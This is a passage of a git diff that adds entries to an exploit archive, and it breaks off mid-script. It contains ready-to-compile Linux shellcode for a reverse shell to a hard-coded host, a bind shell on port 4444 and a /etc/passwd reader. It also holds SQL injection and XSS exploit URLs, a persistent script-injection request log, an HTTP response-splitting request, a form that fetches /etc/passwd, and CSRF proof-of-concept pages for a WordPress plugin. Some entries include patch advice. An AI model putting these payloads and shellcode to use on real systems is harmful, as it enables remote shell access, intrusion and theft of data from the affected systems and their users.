+      DNT[1]
+      Referer[http://localhost:8080/Files/]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Header:
+      Content-Length[9636]
+      Date[Mon, 25 Jan 2016 09:54:55 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status: 200[OK]
+POST http://localhost:8080/API/CreateFolder Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+      Referer[http://localhost:8080/Files/]
+      Content-Length[56]
+      Connection[keep-alive]
+   POST-Daten:
+      path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
+   Response Header:
+      Content-Length[23]
+      Date[Mon, 25 Jan 2016 09:55:00 GMT]
+      Server[Pinfolio (modified lighttpd)]
+-
+Status:  200[OK]
+GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[345] Mime Type[text/html]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      DNT[1]
+      Referer[http://localhost:8080/Files/]
+      Connection[keep-alive]
+      Cache-Control[max-age=0]
+   Response Header:
+      Content-Type[text/html]
+      Content-Length[345]
+      Date[Mon, 25 Jan 2016 09:55:02 GMT]
+      Server[Pinfolio (modified lighttpd)]
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The arbitrary file upload vulnerability can be patched by a secure parse and validation of the filename value in the upload POST method request.
+Restrict the input and disallow special chars or script code tags to prevent an attack. Disallow usage of multiple file extensions and approve them as well.
+
+1.2
+The local command inject vulnerability can be patched by a secure parse and encode of the header location in the file dir listing index, were the devicename is displayed.
+
+1.3
+The persistent input validation web vulnerability can be patched by a secure encode and parse of the `path` and `name (class)` values in 
+the `NewTextFile` or `New Folder` modules. Disallow usage of special chars on input to prevent persistent script code injection attacks.
+Encode the index output values to prevent the execution point of the issue.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the arbitrary file upload web vulnerability in the filename value on upload is estimated as high. (CVSS 7.3)
+
+1.2
+The local command inject web vulnerability in the device name value is estimated as medium. (CVSS 6.1)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/java/webapps/39334.txt b/platforms/java/webapps/39334.txt
new file mode 100755
index 000000000..72b55127d
--- /dev/null
+++ b/platforms/java/webapps/39334.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/68022/info
+
+Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected. 
+
+GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load 
\ No newline at end of file
diff --git a/platforms/linux/shellcode/39336.c b/platforms/linux/shellcode/39336.c
new file mode 100755
index 000000000..10cb57519
--- /dev/null
+++ b/platforms/linux/shellcode/39336.c
@@ -0,0 +1,134 @@
+/*
+[+] Author  : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for port:4444 host:192.168.1.29
+
+00000000  31C0              xor eax,eax
+00000002  40                inc eax
+00000003  7448              jz 0x4d
+00000005  6A66              push byte +0x66
+00000007  58                pop eax
+00000008  99                cdq
+00000009  52                push edx
+0000000A  42                inc edx
+0000000B  52                push edx
+0000000C  89D3              mov ebx,edx
+0000000E  42                inc edx
+0000000F  52                push edx
+00000010  89E1              mov ecx,esp
+00000012  CD80              int 0x80
+00000014  93                xchg eax,ebx
+00000015  89D1              mov ecx,edx
+00000017  B03F              mov al,0x3f
+00000019  CD80              int 0x80
+0000001B  49                dec ecx
+0000001C  79F9              jns 0x17
+0000001E  B066              mov al,0x66
+00000020  87DA              xchg ebx,edx
+00000022  68C0A8011D        push dword 0x1d01a8c0
+00000027  6668115C          push word 0x5c11
+0000002B  6653              push bx
+0000002D  43                inc ebx
+0000002E  89E1              mov ecx,esp
+00000030  6A10              push byte +0x10
+00000032  51                push ecx
+00000033  52                push edx
+00000034  89E1              mov ecx,esp
+00000036  CD80              int 0x80
+00000038  6A0B              push byte +0xb
+0000003A  58                pop eax
+0000003B  99                cdq
+0000003C  89D1              mov ecx,edx
+0000003E  52                push edx
+0000003F  682F2F7368        push dword 0x68732f2f
+00000044  682F62696E        push dword 0x6e69622f
+00000049  89E3              mov ebx,esp
+0000004B  CD80              int 0x80
+0000004D  48                dec eax
+0000004E  31C0              xor eax,eax
+00000050  48                dec eax
+00000051  31FF              xor edi,edi
+00000053  48                dec eax
+00000054  31F6              xor esi,esi
+00000056  48                dec eax
+00000057  31D2              xor edx,edx
+00000059  4D                dec ebp
+0000005A  31C0              xor eax,eax
+0000005C  6A02              push byte +0x2
+0000005E  5F                pop edi
+0000005F  6A01              push byte +0x1
+00000061  5E                pop esi
+00000062  6A06              push byte +0x6
+00000064  5A                pop edx
+00000065  6A29              push byte +0x29
+00000067  58                pop eax
+00000068  0F05              syscall
+0000006A  49                dec ecx
+0000006B  89C0              mov eax,eax
+0000006D  48                dec eax
+0000006E  31F6              xor esi,esi
+00000070  4D                dec ebp
+00000071  31D2              xor edx,edx
+00000073  41                inc ecx
+00000074  52                push edx
+00000075  C6042402          mov byte [esp],0x2
+00000079  66C7442402115C    mov word [esp+0x2],0x5c11
+00000080  C7442404C0A8011D  mov dword [esp+0x4],0x1d01a8c0
+00000088  48                dec eax
+00000089  89E6              mov esi,esp
+0000008B  6A10              push byte +0x10
+0000008D  5A                pop edx
+0000008E  41                inc ecx
+0000008F  50                push eax
+00000090  5F                pop edi
+00000091  6A2A              push byte +0x2a
+00000093  58                pop eax
+00000094  0F05              syscall
+00000096  48                dec eax
+00000097  31F6              xor esi,esi
+00000099  6A03              push byte +0x3
+0000009B  5E                pop esi
+0000009C  48                dec eax
+0000009D  FFCE              dec esi
+0000009F  6A21              push byte +0x21
+000000A1  58                pop eax
+000000A2  0F05              syscall
+000000A4  75F6              jnz 0x9c
+000000A6  48                dec eax
+000000A7  31FF              xor edi,edi
+000000A9  57                push edi
+000000AA  57                push edi
+000000AB  5E                pop esi
+000000AC  5A                pop edx
+000000AD  48                dec eax
+000000AE  BF2F2F6269        mov edi,0x69622f2f
+000000B3  6E                outsb
+000000B4  2F                das
+000000B5  7368              jnc 0x11f
+000000B7  48                dec eax
+000000B8  C1EF08            shr edi,byte 0x8
+000000BB  57                push edi
+000000BC  54                push esp
+000000BD  5F                pop edi
+000000BE  6A3B              push byte +0x3b
+000000C0  58                pop eax
+000000C1  0F05              syscall
+*/
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:39:58
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x48\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68\xc0\xa8\x01\x1d\x66\x68\x11\x5c\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x1d\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
+
+int main(void){
+    (*(void(*)()) shellcode)();
+}
diff --git a/platforms/linux/shellcode/39337.c b/platforms/linux/shellcode/39337.c
new file mode 100755
index 000000000..d763e8545
--- /dev/null
+++ b/platforms/linux/shellcode/39337.c
@@ -0,0 +1,179 @@
+/*
+[+] Author  : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for port:4444
+
+
+00000000  31C0              xor eax,eax
+00000002  40                inc eax
+00000003  7460              jz 0x65
+00000005  31DB              xor ebx,ebx
+00000007  F7E3              mul ebx
+00000009  B066              mov al,0x66
+0000000B  B301              mov bl,0x1
+0000000D  52                push edx
+0000000E  53                push ebx
+0000000F  6A02              push byte +0x2
+00000011  89E1              mov ecx,esp
+00000013  CD80              int 0x80
+00000015  89C6              mov esi,eax
+00000017  B066              mov al,0x66
+00000019  43                inc ebx
+0000001A  52                push edx
+0000001B  6668115C          push word 0x5c11
+0000001F  6653              push bx
+00000021  89E1              mov ecx,esp
+00000023  6A10              push byte +0x10
+00000025  51                push ecx
+00000026  56                push esi
+00000027  89E1              mov ecx,esp
+00000029  CD80              int 0x80
+0000002B  B066              mov al,0x66
+0000002D  B304              mov bl,0x4
+0000002F  52                push edx
+00000030  56                push esi
+00000031  89E1              mov ecx,esp
+00000033  CD80              int 0x80
+00000035  B066              mov al,0x66
+00000037  B305              mov bl,0x5
+00000039  52                push edx
+0000003A  52                push edx
+0000003B  56                push esi
+0000003C  89E1              mov ecx,esp
+0000003E  CD80              int 0x80
+00000040  93                xchg eax,ebx
+00000041  31C9              xor ecx,ecx
+00000043  B102              mov cl,0x2
+00000045  B03F              mov al,0x3f
+00000047  CD80              int 0x80
+00000049  49                dec ecx
+0000004A  79F9              jns 0x45
+0000004C  92                xchg eax,edx
+0000004D  50                push eax
+0000004E  682F2F7368        push dword 0x68732f2f
+00000053  682F62696E        push dword 0x6e69622f
+00000058  89E3              mov ebx,esp
+0000005A  50                push eax
+0000005B  53                push ebx
+0000005C  89E1              mov ecx,esp
+0000005E  50                push eax
+0000005F  89E2              mov edx,esp
+00000061  B00B              mov al,0xb
+00000063  CD80              int 0x80
+00000065  48                dec eax
+00000066  31C0              xor eax,eax
+00000068  48                dec eax
+00000069  31FF              xor edi,edi
+0000006B  48                dec eax
+0000006C  31F6              xor esi,esi
+0000006E  48                dec eax
+0000006F  31D2              xor edx,edx
+00000071  4D                dec ebp
+00000072  31C0              xor eax,eax
+00000074  6A02              push byte +0x2
+00000076  5F                pop edi
+00000077  6A01              push byte +0x1
+00000079  5E                pop esi
+0000007A  6A06              push byte +0x6
+0000007C  5A                pop edx
+0000007D  6A29              push byte +0x29
+0000007F  58                pop eax
+00000080  0F05              syscall
+00000082  49                dec ecx
+00000083  89C0              mov eax,eax
+00000085  4D                dec ebp
+00000086  31D2              xor edx,edx
+00000088  41                inc ecx
+00000089  52                push edx
+0000008A  41                inc ecx
+0000008B  52                push edx
+0000008C  C6042402          mov byte [esp],0x2
+00000090  66C7442402115C    mov word [esp+0x2],0x5c11
+00000097  48                dec eax
+00000098  89E6              mov esi,esp
+0000009A  41                inc ecx
+0000009B  50                push eax
+0000009C  5F                pop edi
+0000009D  6A10              push byte +0x10
+0000009F  5A                pop edx
+000000A0  6A31              push byte +0x31
+000000A2  58                pop eax
+000000A3  0F05              syscall
+000000A5  41                inc ecx
+000000A6  50                push eax
+000000A7  5F                pop edi
+000000A8  6A01              push byte +0x1
+000000AA  5E                pop esi
+000000AB  6A32              push byte +0x32
+000000AD  58                pop eax
+000000AE  0F05              syscall
+000000B0  48                dec eax
+000000B1  89E6              mov esi,esp
+000000B3  48                dec eax
+000000B4  31C9              xor ecx,ecx
+000000B6  B110              mov cl,0x10
+000000B8  51                push ecx
+000000B9  48                dec eax
+000000BA  89E2              mov edx,esp
+000000BC  41                inc ecx
+000000BD  50                push eax
+000000BE  5F                pop edi
+000000BF  6A2B              push byte +0x2b
+000000C1  58                pop eax
+000000C2  0F05              syscall
+000000C4  59                pop ecx
+000000C5  4D                dec ebp
+000000C6  31C9              xor ecx,ecx
+000000C8  49                dec ecx
+000000C9  89C1              mov ecx,eax
+000000CB  4C                dec esp
+000000CC  89CF              mov edi,ecx
+000000CE  48                dec eax
+000000CF  31F6              xor esi,esi
+000000D1  6A03              push byte +0x3
+000000D3  5E                pop esi
+000000D4  48                dec eax
+000000D5  FFCE              dec esi
+000000D7  6A21              push byte +0x21
+000000D9  58                pop eax
+000000DA  0F05              syscall
+000000DC  75F6              jnz 0xd4
+000000DE  48                dec eax
+000000DF  31FF              xor edi,edi
+000000E1  57                push edi
+000000E2  57                push edi
+000000E3  5E                pop esi
+000000E4  5A                pop edx
+000000E5  48                dec eax
+000000E6  BF2F2F6269        mov edi,0x69622f2f
+000000EB  6E                outsb
+000000EC  2F                das
+000000ED  7368              jnc 0x157
+000000EF  48                dec eax
+000000F0  C1EF08            shr edi,byte 0x8
+000000F3  57                push edi
+000000F4  54                push esp
+000000F5  5F                pop edi
+000000F6  6A3B              push byte +0x3b
+000000F8  58                pop eax
+000000F9  0F05              syscall
+*/
+
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:36:45
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x60\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
+
+int main(void){
+    (*(void(*)()) shellcode)();
+}
diff --git a/platforms/linux/shellcode/39338.c b/platforms/linux/shellcode/39338.c
new file mode 100755
index 000000000..c0d6d0e65
--- /dev/null
+++ b/platforms/linux/shellcode/39338.c
@@ -0,0 +1,102 @@
+/*
+[+] Author  : B3mB4m
+[~] Contact : b3mb4m@protonmail.com
+[~] Project : https://github.com/b3mb4m/Shellsploit
+[~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu
+
+
+
+#If you want test it, you must compile it within x86 OS.
+#Or basically you can get it with shellsploit.
+#Default setthings for /etc/passwd
+
+
+00000000  31C0              xor eax,eax
+00000002  40                inc eax
+00000003  743A              jz 0x3f
+00000005  31C9              xor ecx,ecx
+00000007  31C0              xor eax,eax
+00000009  31D2              xor edx,edx
+0000000B  51                push ecx
+0000000C  B005              mov al,0x5
+0000000E  6873737764        push dword 0x64777373
+00000013  68632F7061        push dword 0x61702f63
+00000018  682F2F6574        push dword 0x74652f2f
+0000001D  89E3              mov ebx,esp
+0000001F  CD80              int 0x80
+00000021  89D9              mov ecx,ebx
+00000023  89C3              mov ebx,eax
+00000025  B003              mov al,0x3
+00000027  66BAFF0F          mov dx,0xfff
+0000002B  6642              inc dx
+0000002D  CD80              int 0x80
+0000002F  31C0              xor eax,eax
+00000031  31DB              xor ebx,ebx
+00000033  B301              mov bl,0x1
+00000035  B004              mov al,0x4
+00000037  CD80              int 0x80
+00000039  31C0              xor eax,eax
+0000003B  B001              mov al,0x1
+0000003D  CD80              int 0x80
+0000003F  EB3F              jmp short 0x80
+00000041  5F                pop edi
+00000042  80770B41          xor byte [edi+0xb],0x41
+00000046  48                dec eax
+00000047  31C0              xor eax,eax
+00000049  0402              add al,0x2
+0000004B  48                dec eax
+0000004C  31F6              xor esi,esi
+0000004E  0F05              syscall
+00000050  6681ECFF0F        sub sp,0xfff
+00000055  48                dec eax
+00000056  8D3424            lea esi,[esp]
+00000059  48                dec eax
+0000005A  89C7              mov edi,eax
+0000005C  48                dec eax
+0000005D  31D2              xor edx,edx
+0000005F  66BAFF0F          mov dx,0xfff
+00000063  48                dec eax
+00000064  31C0              xor eax,eax
+00000066  0F05              syscall
+00000068  48                dec eax
+00000069  31FF              xor edi,edi
+0000006B  40                inc eax
+0000006C  80C701            add bh,0x1
+0000006F  48                dec eax
+00000070  89C2              mov edx,eax
+00000072  48                dec eax
+00000073  31C0              xor eax,eax
+00000075  0401              add al,0x1
+00000077  0F05              syscall
+00000079  48                dec eax
+0000007A  31C0              xor eax,eax
+0000007C  043C              add al,0x3c
+0000007E  0F05              syscall
+00000080  E8BCFFFFFF        call dword 0x41
+00000085  2F                das
+00000086  657463            gs jz 0xec
+00000089  2F                das
+0000008A  7061              jo 0xed
+0000008C  7373              jnc 0x101
+0000008E  7764              ja 0xf4
+00000090  41                inc ecx
+00000091  2F                das
+00000092  657463            gs jz 0xf8
+00000095  2F                das
+00000096  7061              jo 0xf9
+00000098  7373              jnc 0x10d
+0000009A  7764              ja 0x100
+*/
+
+
+//Project : https://github.com/b3mb4m/Shellsploit
+//This file created with shellsploit ..
+//19/01/2016 - 00:29:31
+//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
+
+unsigned char shellcode[] =
+"\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+int main(void){
+    (*(void(*)()) shellcode)();
+}
diff --git a/platforms/php/webapps/39332.txt b/platforms/php/webapps/39332.txt
new file mode 100755
index 000000000..8ea60a5e0
--- /dev/null
+++ b/platforms/php/webapps/39332.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67481/info
+
+Wiser is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attacker can exploit this issue to download backup files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+Wiser 2.10 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/voip/sipserver/class/baixarBackup.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39333.html b/platforms/php/webapps/39333.html
new file mode 100755
index 000000000..a90db7b08
--- /dev/null
+++ b/platforms/php/webapps/39333.html
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/67935/info
+
+The Elegance theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 
+
+<html>
+<body>
+<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
+Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
+<input type="submit">
+</form>
+</body>
+</html>
diff --git a/platforms/php/webapps/39339.txt b/platforms/php/webapps/39339.txt
new file mode 100755
index 000000000..451080dfe
--- /dev/null
+++ b/platforms/php/webapps/39339.txt
@@ -0,0 +1,98 @@
+#Product : BK Mobile CMS
+#Exploit Author : Rahul Pratap Singh
+#Version : 2.4
+#Home page Link :
+http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
+#Website : 0x62626262.wordpress.com
+#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
+#Date : 27/Jan/2016
+
+SQLi Vulnerability:
+
+----------------------------------------
+Description:
+----------------------------------------
+"g_name" parameter is not sanitized that leads to SQL Injection.
+
+----------------------------------------
+Vulnerable Code:
+----------------------------------------
+file: gallery1.php
+line 5
+
+$get_g_name = $_GET['g_name'];
+$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
+gallery_name='".$get_g_name."' ORDER BY id DESC";
+
+----------------------------------------
+Exploit:
+----------------------------------------
+http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
+
+----------------------------------------
+POC:
+----------------------------------------
+https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png
+
+
+XSS Vulnerability:
+
+----------------------------------------
+Description:
+----------------------------------------
+"g_name" parameter is not sanitized that leads to reflected XSS.
+
+----------------------------------------
+Vulnerable Code:
+----------------------------------------
+file: gallery1.php
+
+line 81-88
+
+<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
+<?php echo $custom_bg_active; ?>>
+
+<?php include("../header.php"); ?>
+
+<div role="main" class="ui-content">
+
+<div class="jqm-block-content">
+<h3><?php echo $_GET['g_name']; ?></h3>
+
+----------------------------------------
+Exploit:
+----------------------------------------
+http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
+
+----------------------------------------
+POC:
+----------------------------------------
+https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png
+
+Fix:
+Update to 2.5
+
+Vulnerability Disclosure Timeline:
+→ January 14, 2015 – Bug discovered, initial report to Vendor
+→ January 14, 2015 – Vendor acknowledged
+→ January 19, 2015 – Vendor Deployed a Patch
+
+#######################################
+# CTG SECURITY SOLUTIONS #
+# www.ctgsecuritysolutions.com #
+#######################################
+
+Pub Ref:
+https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
+http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
+
+[+] Disclaimer
+
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
diff --git a/platforms/php/webapps/39341.txt b/platforms/php/webapps/39341.txt
new file mode 100755
index 000000000..4a9dcabe4
--- /dev/null
+++ b/platforms/php/webapps/39341.txt
@@ -0,0 +1,103 @@
+# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
+# Date: 2016-01-28
+# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
+# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
+# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Vendor: CodePeople.net
+# Vebdor URI: http://codepeople.net
+# Version: 1.1.24
+# Tested on: windows 10 + firefox + sqlmap 1.0.
+
+===================
+PRODUCT DESCRIPTION
+===================
+"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
+a calendar**. The booking form is linked to a **PayPal** payment process.
+
+You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
+where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
+that can be accepted for each time-slot."
+
+(copy of readme file)
+
+
+======================
+EXPLOITATION TECHNIQUE
+======================
+remote
+
+==============
+SEVERITY LEVEL
+==============
+
+medium
+
+================================
+TECHNICAL DETAILS && DESCRIPTION
+================================
+
+Multiple privilege escalation were found in appointment-booking-calendar plugin that allows remote low level
+and unauthenticated users to update calendar owners and options (allowing persistent XSS).
+
+================
+PROOF OF CONCEPT
+================
+
+Changing all appointment tables with UTF-8 charset, injecting persistent XSS into ´ict´ and ´ics´ options and setting
+´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to value ´1´.
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
+<body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
+        xhr.send();
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+
+Updating calendar with id 1 and setting name with persistent XSS (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"] 
+is added in a post, the injected XSS will appear, in administration page appear too).
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
+<body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
